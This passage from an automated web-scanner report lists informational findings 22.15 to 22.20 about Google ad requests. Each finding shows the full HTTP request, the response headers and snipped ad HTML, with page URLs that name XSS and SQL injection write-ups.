X-XSS-Protection: 1; mode=block
Content-Length: 12689

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/hourlydeploycom/coldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.owlcti.com/energy%26adT%3DOwl%2BComputing%2BTech%26adU%3Dwww.ServerTech.com%26adT%3DServer%2BDowntime/Overload%253F%26adU%3Dwww.Deloitte.com/us%26adT%3DInsider%2BThreat%2BSecurity%26gl%3DUS&usg=AFQjCNGaNBAPUAlHhfIQiJnQRGGgqTVeGg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.15. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303760684&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html&dt=1303742684517&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303742684539&frm=0&adk=1607234649&ga_vid=273394407.1303742685&ga_sid=1303742685&ga_hid=12397547&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&eid=33895132&fu=0&ifi=1&dtd=80&xpc=wTS936Gnpy&p=file%3A//

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.FullSail.edu%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGpHBaNIZ8uAAtlrAq_XZ6rgDf35A

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303760684&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html&dt=1303742684517&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303742684539&frm=0&adk=1607234649&ga_vid=273394407.1303742685&ga_sid=1303742685&ga_hid=12397547&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&eid=33895132&fu=0&ifi=1&dtd=80&xpc=wTS936Gnpy&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:44:33 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4639

<html><head><style></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.FullSail.edu%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGpHBaNIZ8uAAtlrAq_XZ6rgDf35A" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

22.16. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303756477&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303738508150&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303738508337&frm=0&adk=1819763764&ga_vid=462818616.1303738508&ga_sid=1303738508&ga_hid=1973000711&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=277&xpc=aKLTpShQKv&p=http%3A//xss.cx

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DFree%2BNetwork%2BScan%26adU%3Dwww.eEye.com/Free-Scanner/%26adT%3DFree%2BVulnerabilityScanner%26adU%3Dwww.clcillinois.edu%26adT%3DSr/Lead%2BWeb%2BDeveloper%26gl%3DUS&usg=AFQjCNGPqnY5UG7u7Cc-bpkvGzBJ3JUqqA

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303756477&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303738508150&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303738508337&frm=0&adk=1819763764&ga_vid=462818616.1303738508&ga_sid=1303738508&ga_hid=1973000711&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=277&xpc=aKLTpShQKv&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 13:34:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12692

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DFree%2BNetwork%2BScan%26adU%3Dwww.eEye.com/Free-Scanner/%26adT%3DFree%2BVulnerabilityScanner%26adU%3Dwww.clcillinois.edu%26adT%3DSr/Lead%2BWeb%2BDeveloper%26gl%3DUS&usg=AFQjCNGPqnY5UG7u7Cc-bpkvGzBJ3JUqqA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.17. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303757158&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html&dt=1303739157768&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303739158761&frm=0&adk=1607234649&ga_vid=1027902251.1303739159&ga_sid=1303739159&ga_hid=375496671&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=1514&xpc=qT0wDNmjtE&p=file%3A//

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DBIRT-Exchange.com/JBoss%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNH0-cW4j459O3JY9HOo2mnyhUiHDA

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303757158&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html&dt=1303739157768&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303739158761&frm=0&adk=1607234649&ga_vid=1027902251.1303739159&ga_sid=1303739159&ga_hid=375496671&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=1514&xpc=qT0wDNmjtE&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 13:45:48 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4371

<html><head><style></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DBIRT-Exchange.com/JBoss%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNH0-cW4j459O3JY9HOo2mnyhUiHDA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

22.18. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758255&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm&dt=1303740255147&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303740255194&frm=0&adk=1819763764&ga_vid=1938262857.1303740256&ga_sid=1303740256&ga_hid=1224938138&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=784&xpc=ZGxB6Kj0D3&p=file%3A//

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Credant.com/Healthcare%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGN5LJ8qK09GbjbO3hx95bAsitUaA

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758255&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm&dt=1303740255147&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303740255194&frm=0&adk=1819763764&ga_vid=1938262857.1303740256&ga_sid=1303740256&ga_hid=1224938138&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=784&xpc=ZGxB6Kj0D3&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:04:05 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4340

<html><head><style></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Credant.com/Healthcare%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGN5LJ8qK09GbjbO3hx95bAsitUaA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

22.19. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303756505&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303738505554&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303738505788&frm=0&adk=1819763764&ga_vid=413277210.1303738506&ga_sid=1303738506&ga_hid=678088752&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&eid=44901217%2C33895132&fu=0&ifi=1&dtd=331&xpc=ckA4kh6DtR&p=file%3A//

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26gl%3DUS&usg=AFQjCNHo7HQbxZHgN90066UkdYLmA9HNiA

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303756505&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303738505554&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303738505788&frm=0&adk=1819763764&ga_vid=413277210.1303738506&ga_sid=1303738506&ga_hid=678088752&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&eid=44901217%2C33895132&fu=0&ifi=1&dtd=331&xpc=ckA4kh6DtR&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 13:34:56 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26gl%3DUS&usg=AFQjCNHo7HQbxZHgN90066UkdYLmA9HNiA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.20. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303751190&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html&dt=1303733223690&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303733223727&frm=0&adk=1607234649&ga_vid=700321566.1303733224&ga_sid=1303733224&ga_hid=1638361633&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=978&fu=0&ifi=1&dtd=125&xpc=KPpLNnOf5F&p=http%3A//xss.cx

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DCymphonix.com/Application%252BSecurity%26adT%3DApplication%2BSecurity%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3DPRWeb.com%26adT%3DPress%2BRelease%2BTemplates%26gl%3DUS&usg=AFQjCNFiTNCYKiwvS0BXGBykLX8TGZTh0g

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303751190&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html&dt=1303733223690&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303733223727&frm=0&adk=1607234649&ga_vid=700321566.1303733224&ga_sid=1303733224&ga_hid=1638361633&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=978&fu=0&ifi=1&dtd=125&xpc=KPpLNnOf5F&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 12:06:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
